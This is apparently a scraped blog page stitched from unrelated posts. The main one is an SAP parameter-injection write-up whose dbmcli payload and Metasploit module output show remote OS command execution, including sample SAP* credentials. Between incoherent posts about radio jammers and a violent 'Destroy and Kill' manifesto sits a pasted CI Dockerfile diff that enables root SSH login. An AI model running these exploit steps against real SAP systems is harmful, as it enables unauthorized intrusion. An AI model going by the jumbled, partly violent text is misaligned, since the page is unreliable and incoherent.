Sunday, May 13, 2018

SAP Parameter Injection

The technique employed involves causing the executable to write attacker-controlled inputs to an attacker-controlled file. The executable is then used to read commands to execute from the same file. For example passing the following command line to the dbmcli executable results in the creation of a file named pwned.txt in the /tmp folder.
-o /tmp/pwned.txt –n pwnie\n!id\tfoo\n
The contents of the file are presented below.
Error! Connection failed to node pwnie
!id
 for database (no dbname):
unknown host pwnie
!id
 (see /etc/hosts
If the file is passed to the binary as illustrated in the command line below, then the commands prepended with an exclamation mark will be executed (in this case twice).
-ic /tmp/pwned.txt
The Remote Function Calls (RFCs) SXPG_CALL_SYSTEM and SXPG_COMMAND_EXEC can be used remotely to execute OS commands on SAP systems (as configured in transaction SM69). I previously blogged about this and the post can be found here. Authentication and relevant permissions are required.
On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands by injecting metacharacters; however on Linux they cannot – until now of course. By making use of the same exploit technique that Context IS did for the exploitation of the SAP Host Control vulnerability, we can execute arbitrary commands against Linux systems.
I have crafted several Metasploit modules to demonstrate this vector and the execution of the RFC SXPG_CALL_SYSTEM via the SOAP connector can be seen below.
msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > show options

Module options (auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec):

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  CLIENT   001              yes       Client
  CMD      id               yes       Command to run
  OS       Linux            yes       Windows/Linux
  PASS     06071992         yes       Password
  Proxies                   no        Use a proxy chain
  RHOSTS   172.16.252.150   yes       SAP ICM server address
  RPORT    8042             yes       SAP ICM server port number
  THREADS  1                yes       The number of concurrent threads
  USER     SAP*             yes       Username
  VHOST                     no        HTTP server virtual host

msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > run

[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response

[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection
===============================================

  Output
  ------
  ;!id
  uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > set CMD uname -a
CMD => uname -a
msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > run

[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response

[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection
===============================================

  Output
  ------
  ;!uname -a
  Linux linux-gateway 2.6.32.43-0.4-default #1 SMP 2011-07-14 14:47:44 +0200 x86_64 x86_64 x86_64 GNU/Linux

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The output below illustrates the execution of the RFC SXPG_CALL_SYSTEM from the module directly against the RFC connector.
msf  auxiliary(sap_rfc_dbmcli_sxpg_call_system_command_exec) > run

[+] 172.16.252.150:3342 [SAP] Successful login - 001:SAP*:06071992
[+] 172.16.252.150:3342 [SAP] Successful login - 001:SAP*:06071992

[SAP] Command Exec
==================

   Output
   ------
   
   >!id
   uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
These modules and many more will be released and submitted to the framework very soon. In the mean time you can download the modules to try from here:
at No comments:

Saturday, May 12, 2018

welcome back to war! "makes it possible...to make jammers sufficiently small that a DJN can take the form of a dust suspending in the air...Therefore, new miniature devices such as nanotube radio may find their first application in jamming dust..."...so you to understand...their worried is distance, while they make the war operations, so this makes possible to jamm all nodes, or at least be able to find one node and jamm the all network...see if you understand "we...are radio jammers"
at No comments:
I don't accept living under Law written in 1789!!!! I do not accept living under a Constitution written in 1974!!!!! I do not accept that the only 3 Men thinking, were Thomas Hobbes, John Smith and Jean Jacques Rousseau!!!! I do not accept a world ruled by people who born in times like 1945, that did not had soap for bathing, or toothpaste!!!!!! I do not accept living under a Law made by half deadmen, and half pensionists !!!! Constitutions must revisited every generation, by referendum!!!! Politics must be community work!!!! I do not accept Adam Smith the Thinker, and I'm the fruit fly!!!!! Our Constitution will based on the Law of our times, destiny for our generation and future generations!!! Our Constitution will defend, Uploads, Upgrades, Downloads as part of Democracy development!!!! Our Constitution will abolish tests made and evaluated by Humans!!! We will abolish Kings and Queens, Lords and Faraos! Therefore, I'm here to Destroy and Kill ! Make their armies so insecure they will hardly breath loud!!!
at No comments:
scalable is
diff --git a/Dockerfile b/Dockerfile
new file mode 100644
index 0000000..c124898
--- /dev/null
+++ b/Dockerfile
@@ -0,0 +1,33 @@
+# See also https://docs.docker.com/examples/running_ssh_service/
+
+FROM ubuntu:14.04
+MAINTAINER Takashi Masuda
+
+RUN apt-get update && \
+    apt-get install -y curl openssh-server rsync && \
+    apt-get clean && \
+
+    # SSHD
+    mkdir /var/run/sshd && \
+    sed -i -e 's/PermitRootLogin without-password/PermitRootLogin yes/' \
+           -e 's/#PasswordAuthentication yes/PasswordAuthentication no/' /etc/ssh/sshd_config && \
+
+    # Create /root/.ssh/authorized_keys
+    mkdir -p /root/.ssh && \
+    echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXDZmjpkxKwjFBec3v1S9vHpEAmgT7k5A8iLlhUtRGVvgADLgoblHgNitCg8qoDLDeRX0iY+smjChP1n0LBEaSZR+9G6J6/HPg3GHBaSDCpZK1sajTamGBPLokTDStdejJQPyh7ZZUxyN8RzOmH1Eu2FggCI+y/b60KxQnJorG5fxfhy4faFuzdUmEN+yaJu7U5pCQcsNhDqOKCpfiBm2Of1oPby4VybIXvF4TgkpJJ7JwmCIG62X5ldSh86lmKWQdJanelmz/GkJ+2CtSuKjIQuFajz1nBcNZzjPXSBYA+qDCT0mNQNvtgyDZjDZ4ALpkhzjeqHnd+esuulo1o8fJ ci-docker > /root/.ssh/authorized_keys  && \
+    chmod 600 /root/.ssh/authorized_keys && \
+
+    # SSH login fix. Otherwise user is kicked off after login
+    sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd && \
+
+    # Install Chef Client
+    # See also https://docs.chef.io/install_omnibus.html
+    CHEF_VERSION=12.4.1 && \
+    curl -L https://www.chef.io/chef/install.sh | bash -s -- -v $CHEF_VERSION && \
+
+    # Use in site-cookbooks
+    echo PermitUserEnvironment yes >> /etc/ssh/sshd_config && \
+    echo DOCKER_IN_CIRCLECI=true > /root/.ssh/environment
+
+EXPOSE 22
+CMD ["/usr/sbin/sshd", "-D"]
diff --git a/circle.yml b/circle.yml
index 8b1eb47..957be6a 100644
--- a/circle.yml
+++ b/circle.yml
@@ -1,7 +1,10 @@
+machine:
+  services:
+    - docker
+
 dependencies:
   cache_directories:
-    - ~/.vagrant.d
-    - ~/tmp
+    - ~/cache
   pre:
     - |
       gem update bundler --no-document
@@ -10,19 +13,7 @@ dependencies:
         exit 0
       fi
  
-      VERSION=1.7.4
-
-      mkdir -p ~/tmp
-      cd ~/tmp
-
-      if [ ! -f vagrant_${VERSION}_x86_64.deb ]; then
-        wget https://dl.bintray.com/mitchellh/vagrant/vagrant_${VERSION}_x86_64.deb
-      fi
-      sudo dpkg -i vagrant_${VERSION}_x86_64.deb
-
-      if ! vagrant plugin list | fgrep -q vagrant-aws; then
-        vagrant plugin install vagrant-aws
-      fi
+      ./script/bootstrap-docker.sh
  
 test:
   pre:
@@ -30,21 +21,18 @@ test:
       if [ -n "${BUNDLE_UPDATE}" ]; then
         exit 0
       fi
-      vagrant up ec2
-      vagrant ssh-config --host=ec2 ec2 >> ~/.ssh/config
-      bundle exec knife solo bootstrap ec2
+
+      bundle exec knife solo cook ci-docker
+
+      # workaround
+      ssh ci-docker "/etc/init.d/mongodb start && /etc/init.d/td-agent start"
   override:
     - |
       if [ -n "${BUNDLE_UPDATE}" ]; then
         exit 0
       fi
-      bundle exec rake spec:ec2
-  post:
-    - |
-      if [ -n "${BUNDLE_UPDATE}" ]; then
-        exit 0
-      fi
-      vagrant destroy -f ec2
+
+      bundle exec rake spec:ci:docker
  
 deployment:
   production:
diff --git a/nodes/ec2.json b/nodes/ci-docker.json
similarity index 100%
rename from nodes/ec2.json
rename to nodes/ci-docker.json
diff --git a/script/bootstrap-docker.sh b/script/bootstrap-docker.sh
new file mode 100755
index 0000000..b250160
--- /dev/null
+++ b/script/bootstrap-docker.sh
@@ -0,0 +1,36 @@
+#!/bin/sh -xe
+
+cat <> $HOME/.ssh/config
+Host ci-docker
+  HostName 127.0.0.1
+  User root
+  Port 40022
+  UserKnownHostsFile /dev/null
+  StrictHostKeyChecking no
+  PasswordAuthentication no
+  IdentityFile ~/.ssh/id_ci-docker
+  IdentitiesOnly yes
+  LogLevel FATAL
+EOF
+
+chmod 600 $HOME/.ssh/config
+
+docker_archive=$HOME/cache/ubuntu.tar.gz
+md5_digest_file=$HOME/cache/Dockerfile.digest
+
+cache_is_available() {
+   md5sum --status --quiet --check $md5_digest_file > /dev/null 2>&1
+}
+
+if cache_is_available; then
+   docker load < $docker_archive
+else
+   mkdir -p $HOME/cache
+   docker build -t docker/ubuntu .
+   md5sum $HOME/$CIRCLE_PROJECT_REPONAME/Dockerfile > $md5_digest_file
+   docker save docker/ubuntu | gzip -c > $docker_archive
+fi
+
+docker info
+
+docker run -d --privileged -p 40022:22 docker/ubuntu
diff --git a/site-cookbooks/hostname/recipes/default.rb b/site-cookbooks/hostname/recipes/default.rb
index 3525de7..9c25938 100644
--- a/site-cookbooks/hostname/recipes/default.rb
+++ b/site-cookbooks/hostname/recipes/default.rb
@@ -15,4 +15,5 @@ end
  
 file '/etc/hostname' do
   content "#{fqdn}\n"
+  atomic_update false
 end
diff --git a/site-cookbooks/jdk/recipes/default.rb b/site-cookbooks/jdk/recipes/default.rb
index 8a04f0a..f04839c 100644
--- a/site-cookbooks/jdk/recipes/default.rb
+++ b/site-cookbooks/jdk/recipes/default.rb
@@ -7,4 +7,7 @@
 # All rights reserved - Do Not Redistribute
 #
  
-package 'openjdk-7-jdk'
+package 'openjdk-7-jdk' do
+  # See https://github.com/docker/docker/issues/963
+  options '--no-install-recommends' if ENV['DOCKER_IN_CIRCLECI']
+end
diff --git a/site-cookbooks/ufw/recipes/default.rb b/site-cookbooks/ufw/recipes/default.rb
index 6a0f2e7..289dcc6 100644
--- a/site-cookbooks/ufw/recipes/default.rb
+++ b/site-cookbooks/ufw/recipes/default.rb
@@ -7,6 +7,8 @@
 # All rights reserved - Do Not Redistribute
 #
  
+return if ENV['DOCKER_IN_CIRCLECI']
+
 execute 'ufw reload' do
   action :nothing
 end
diff --git a/spec/role/ci_spec.rb b/spec/role/ci_spec.rb
index 5a091d7..d8798a8 100644
--- a/spec/role/ci_spec.rb
+++ b/spec/role/ci_spec.rb
@@ -27,7 +27,6 @@ describe 'prod' do
   it_behaves_like 'sysstat'
   it_behaves_like 'td-agent'
   it_behaves_like 'timezone'
-  it_behaves_like 'ufw'
   it_behaves_like 'user'
   it_behaves_like 'zsh'
 end
diff --git a/tasks/spec.rake b/tasks/spec.rake
index 120ff7f..f4265f6 100644
--- a/tasks/spec.rake
+++ b/tasks/spec.rake
@@ -7,8 +7,8 @@ hosts = [
     role: 'prod',
   },
   {
-    name: 'ec2',
-    short_name: 'ec2',
+    name: 'ci-docker',
+    short_name: 'ci:docker',
     role: 'ci',
   },
   {
Rsync - 227 - codegists.com
The best code search for Developers
at No comments:
Subscribe to: Posts (Atom)